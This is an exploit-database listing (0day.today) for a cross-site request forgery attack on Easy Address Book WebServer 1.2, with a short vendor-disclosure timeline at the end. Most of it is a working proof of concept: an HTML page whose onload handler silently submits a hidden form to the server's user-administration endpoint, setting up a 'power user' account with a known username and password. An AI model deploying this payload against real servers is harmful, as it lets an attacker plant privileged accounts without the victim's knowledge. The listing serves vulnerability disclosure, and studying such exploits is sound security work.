[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easy Address book Webserver 1.2 CSRF

Author
Markot
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12408
Category
web applications
Date add
26-05-2010
Platform
php
====================================
Easy Address book Webserver 1.2 CSRF
====================================


# Software      : Easy Address Book WebServer 1.2
# Author        : Markot
# Date          : May 25, 2010
# OS            : Windows
# Tested on     : XP SP3 En (Virtual box)
# Type of vuln  : CSRF
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
 
#code
 
 <html>
 <body>
 <body onload="document.forms['Login'].submit();">
 <form method="POST" name="Login" action="http://192.168.1.200:80/users_admin.ghp">
 <input type="hidden" name="userid" value="3"/>
 <input type="hidden" name="username" value="corelanteam"/>
 <input type="hidden" name="password" value="corelanteam"/>
 <input type="hidden" name="email" value="markot@corelan.be"/>
 <input type="hidden" name="level" value="power user"/>
 <input type="hidden" name="state" value="Enable"/>
 <input type="hidden" name="add_user" value="Update"/>
 </form>
 </body>
 </html>
 
Author/Vendor communication
 
 May 1 2010 : vendor contacted
 
 May 17 2010: reminder sent, no feedback from the vendor
 
 May 25 2010: Public disclosure



#  0day.today [2024-12-25]  #